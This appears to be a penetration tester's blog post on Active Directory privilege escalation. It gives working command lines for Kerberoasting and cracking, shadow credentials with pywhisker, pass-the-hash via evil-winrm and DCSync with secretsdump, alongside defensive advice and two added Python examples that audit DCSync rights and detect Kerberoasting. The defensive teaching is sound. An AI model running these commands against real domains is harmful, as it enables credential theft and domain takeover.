Why AD Is Still the Favourite Target
Every enterprise AD environment I've tested has had at least one viable path from a standard domain user to Domain Admin. The technology is complex, delegation is confusing, and ACL misconfigurations accumulate for years without anyone noticing.
Enumeration First
# BloodHound collection
bloodhound-python -u lowpriv -p 'Password1!' -d corp.local -c All --zip
# PowerView (from a Windows foothold)
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
Kerberoasting
Any authenticated domain user can request a service ticket (TGS) for any account that has an SPN. Part of that ticket is encrypted with the service account's password-derived key, so you can take it offline and guess passwords against it; if the password is weak, cracking gives you the account's credentials. Only accounts with SPNs and human-chosen passwords are worth the effort: machine accounts have long random passwords that will never crack. Ask for RC4 tickets wherever the DC still issues them (etype 23, the $krb5tgs$23$ format), since they crack far faster than AES ones:
# -request pulls a ticket for every SPN found; write the hashes out so hashcat can read them
GetUserSPNs.py corp.local/lowpriv:'Password1!' -dc-ip 10.10.10.10 -request -outputfile spn_hashes.txt
# -m 13100 is Kerberos 5 TGS-REP etype 23 (RC4); AES tickets ($krb5tgs$17$ / $krb5tgs$18$) need -m 19600 / 19700 and are much slower
hashcat -m 13100 spn_hashes.txt rockyou.txt
ACL Abuse: GenericWrite
BloodHound will show you if your user has GenericWrite over another user. GenericWrite covers every non-protected attribute on the target, and the two that matter are msDS-KeyCredentialLink and servicePrincipalName. Writing a key pair you control into msDS-KeyCredentialLink (a shadow credential) lets you obtain a TGT for the target over PKINIT, which needs a DC that can do PKINIT (in practice, a domain with AD CS); pywhisker does the write and saves the key material for you:
python3 pywhisker.py -d corp.local -u lowpriv -p 'Password1!' \
--target svcadmin --action add
If PKINIT is not available, add an SPN to the target instead and Kerberoast it (targeted Kerberoasting), then remove the SPN when you are done.
Pass-the-Hash and Lateral Movement
NTLM uses the NT hash itself as the key, so once you have it you do not need the plaintext. evil-winrm's -H takes the NT hash only: the 32 hex characters after the colon in secretsdump output. The aad3b435b51404eeaad3b435b51404ee in front of it is the empty LM hash and is not passed:
evil-winrm -i 10.10.10.20 -u Administrator -H <nt_hash>
This works for domain accounts and for the built-in local Administrator (RID 500); other local admins are blocked by UAC remote restrictions unless LocalAccountTokenFilterPolicy is set, and any account in Protected Users cannot authenticate with NTLM at all.
DCSync
DCSync needs both DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object (Administrators, Domain Admins, Enterprise Admins and the domain controllers have them by default; misconfigured service accounts sometimes do too). With them you ask a DC to replicate every account's secrets over DRSUAPI, exactly as another DC would, without ever touching NTDS.dit:
# prompts for svcadmin's password; use -hashes :<nt_hash> if you only have the hash
secretsdump.py corp.local/svcadmin@dc01 -just-dc-ntds
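As an added example (mine, not part of the original post), an offline audit of who can DCSync: parse the domain object's DACL in SDDL form, which you can pull with Get-ADObject -Identity 'DC=corp,DC=local' -Properties nTSecurityDescriptor and read from the .Sddl property of the result, and list every principal that holds both replication rights, or full control, on the object itself. The SDDL string below is constructed (the S-1-5-21 SIDs and the service-account grant are invented), and deny ACEs are ignored, which is a simplification.

```python
"""Added example (not from the original post): list principals that can DCSync
from the domain object's DACL in SDDL form. Deny ACEs are ignored (simplification)."""
import re
from collections import defaultdict

GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
RIGHT_NAMES = {
    GET_CHANGES: "DS-Replication-Get-Changes",
    GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
    GET_CHANGES_FILTERED: "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS, GENERIC_ALL = 0x100, 0x10000000  # ADS_RIGHT_DS_CONTROL_ACCESS, GENERIC_ALL
# Well-known SID aliases that show up in SDDL; anything else is a literal SID
ALIASES = {"DA": "Domain Admins", "EA": "Enterprise Admins", "BA": "BUILTIN\\Administrators",
           "SY": "NT AUTHORITY\\SYSTEM", "ED": "Enterprise Domain Controllers",
           "AU": "Authenticated Users"}

# Constructed sample DACL, shaped like a real domain root's but with invented SIDs
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;CCDCLCSWRPWPLOCRRCWDWO;;;DA)"  # Domain Admins: CR with no GUID = every extended right
    "(A;;GA;;;SY)"                       # SYSTEM: full control
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)"
    # a service account someone granted both replication rights: this is a DCSync path
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1105)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1105)"
    # Get-Changes alone is not enough for DCSync
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1106)"
    # inherit-only ACE: applies to child objects, not to the domain object itself
    "(OA;IO;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1004336348-1177238915-682003330-1107)"
    "(A;;RPLCLORC;;;AU)"
)
ACE_RE = re.compile(r"\(([^)]*)\)")


def _codes(s):
    """Split an SDDL rights or flags string into its two-letter codes."""
    return {s[i:i + 2] for i in range(0, len(s), 2)}


def _has_right(rights, code, bit):
    """Rights may be two-letter codes (CR, GA, ...) or a hex mask (0x100)."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & bit)
    return code in _codes(rights)


def replication_rights(sddl):
    """Map each SID to the replication rights its allow ACEs grant on this object."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        return {}
    granted = defaultdict(set)
    for ace in ACE_RE.findall(m.group(1)):
        parts = ace.split(";")
        if len(parts) < 6:
            continue
        ace_type, flags, rights, obj_guid, _inherit_guid, sid = parts[:6]
        if ace_type not in ("A", "OA") or "IO" in _codes(flags):
            continue  # deny ACEs and inherit-only ACEs do not grant anything here
        obj_guid = obj_guid.lower()
        if _has_right(rights, "GA", GENERIC_ALL) or (not obj_guid and _has_right(rights, "CR", CONTROL_ACCESS)):
            granted[sid].update(RIGHT_NAMES.values())  # full control or all extended rights
        elif obj_guid in RIGHT_NAMES and _has_right(rights, "CR", CONTROL_ACCESS):
            granted[sid].add(RIGHT_NAMES[obj_guid])
    return dict(granted)


def dcsync_capable(sddl):
    """SIDs holding both Get-Changes and Get-Changes-All, i.e. able to DCSync."""
    need = {RIGHT_NAMES[GET_CHANGES], RIGHT_NAMES[GET_CHANGES_ALL]}
    return sorted(sid for sid, rights in replication_rights(sddl).items() if need <= rights)


def describe(sid):
    return ALIASES.get(sid, sid)


if __name__ == "__main__":
    for sid in dcsync_capable(SAMPLE_SDDL):
        print("DCSync-capable:", describe(sid))
```

Anything in that list that is not a domain controller or a tier-0 admin group is a finding; resolve literal SIDs with Get-ADObject -Filter or BloodHound and remove the grant.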
Defensive Takeaways
- Run BloodHound against your own environment quarterly, and after any large ACL or group change; fix the Shortest Paths to Domain Admin it finds, and the DCSync-capable and Kerberoastable principals while you are at it
- Audit service accounts: no user account should have an SPN and a weak or never-rotated password. Move to group Managed Service Accounts where you can (random passwords, rotated automatically), and set msDS-SupportedEncryptionTypes to AES only so the DC stops issuing RC4 tickets for them
- Put privileged accounts in Protected Users: it disables NTLM, RC4 and delegation for members, which breaks Pass-the-Hash and Kerberoasting against them. Test first, keep service and computer accounts out of it, and keep a break-glass account outside it
- Alert on 4769 where TicketEncryptionType is 0x17 (RC4) for a service account that supports AES, and on one account requesting tickets for many SPNs in a short window; raw 4769 volume is far too high to alert on directly
- Alert on 4662 carrying the DS-Replication-Get-Changes-All GUID (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) from any account that is not a domain controller; that is DCSync. This needs Directory Service Access auditing and a SACL on the domain object, or the event is never written
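The 4769 detection logic above, worked through as an added example that is mine and not from the original post. It applies the two Kerberoasting heuristics to constructed 4769 records: an RC4 (0x17) service ticket for a sensitive service account, and one requester pulling RC4 tickets for several different user service accounts within a few minutes. The events, account names, addresses and the sensitive-account watchlist are all constructed; machine accounts and krbtgt are skipped because their keys are random and not crackable.

```python
"""Added example (not from the original post): a Kerberoast detector over
Windows Security event 4769 records. Event and account data are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23: the $krb5tgs$23$ tickets that hashcat -m 13100 cracks

# Constructed 4769 events using the field names the Windows event carries.
# ServiceName is the sAMAccountName of the account the ticket was issued for.
SAMPLE_EVENTS = [
    {"time": "2024-03-01T09:00:01", "TargetUserName": "lowpriv@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50"},
    {"time": "2024-03-01T09:00:02", "TargetUserName": "lowpriv@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50"},
    {"time": "2024-03-01T09:00:02", "TargetUserName": "lowpriv@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50"},
    {"time": "2024-03-01T09:00:03", "TargetUserName": "lowpriv@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50"},
    {"time": "2024-03-01T09:05:00", "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.51"},  # normal AES use of the service
    {"time": "2024-03-01T10:00:00", "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "legacyapp",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.52"},  # one RC4 ticket, not on the watchlist
]


def is_user_service_account(service_name):
    """Computer accounts ($) and krbtgt have random keys; they are not Kerberoast targets."""
    name = service_name.lower()
    return not name.endswith("$") and name != "krbtgt"


def detect_kerberoast(events, sensitive_accounts, burst_threshold=3, window=timedelta(minutes=5)):
    """Return alerts for (1) any RC4 TGS for a sensitive service account and
    (2) one requester obtaining RC4 TGS for >= burst_threshold distinct user
    service accounts within `window` (reported once per requester)."""
    sensitive = {a.lower() for a in sensitive_accounts}
    alerts = []
    rc4_by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        svc = ev["ServiceName"]
        if not is_user_service_account(svc):
            continue
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue  # a modern client asks for AES; RC4 for an AES-capable account is the tell
        user = ev["TargetUserName"]
        if svc.lower() in sensitive:
            alerts.append({"rule": "rc4_tgs_sensitive_spn", "user": user, "service": svc,
                           "src": ev["IpAddress"], "time": ev["time"]})
        rc4_by_user[user].append((datetime.fromisoformat(ev["time"]), svc))
    for user, reqs in rc4_by_user.items():
        for i, (t, _svc) in enumerate(reqs):
            # distinct service accounts this requester hit in the window ending at t
            recent = {s for t2, s in reqs[: i + 1] if t - t2 <= window}
            if len(recent) >= burst_threshold:
                alerts.append({"rule": "rc4_tgs_burst", "user": user,
                               "services": sorted(recent), "time": t.isoformat()})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_EVENTS, {"svc_sql"}):
        print(alert)
```

The burst rule is what catches a blanket GetUserSPNs.py -request run; the watchlist rule is what catches a quiet, targeted request for one high-value SPN. Tune the threshold to your environment, since a few legitimate hosts (monitoring, backup) will request tickets for several services at once.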